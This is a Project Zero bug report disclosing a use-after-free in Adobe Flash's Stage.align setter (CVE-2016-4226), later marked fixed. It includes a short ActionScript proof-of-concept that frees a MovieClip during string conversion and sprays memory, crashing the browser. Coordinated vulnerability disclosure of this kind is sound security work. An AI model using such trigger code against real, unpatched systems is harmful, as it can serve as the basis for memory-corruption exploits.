838 - Adobe Flash: Use-after-free in Stage.align setter - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Aug 2016
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe Reported-2016-Jun-6 CVE-2016-4226

Adobe Flash: Use-after-free in Stage.align setter

Project Member Reported by natashenka@google.com, Jun 7 2016

Back to list

There is a use-after-free in the Stage.align property setter. When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free.

A proof-of-concept is as follows:

this.createEmptyMovieClip("mc", 2);
var o = { toString : f };
mc.func = ASnative(666, 4); //Stage.align setter
mc.func(o);

function f(){
	
	trace("here");
	mc.removeMovieClip();
	for(var i = 0; i < 100; i++){	
		var t = new TextFormat(); // fill up the slots
		
		}
	}

A fla and swf are attached. The swf crashes in Chrome for Windows.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

align.fla
4.9 KB Download

align.swf
739 bytes Download

Project Member Comment 1 by natashenka@google.com, Aug 25 2016

Labels: -Severity-High CVE-2016-4226 Severity-HIgh
Status: Fixed

Fixed in July update

Project Member Comment 2 by natashenka@google.com, Aug 25 2016

Labels: -Restrict-View-Commit

► Sign in to add a comment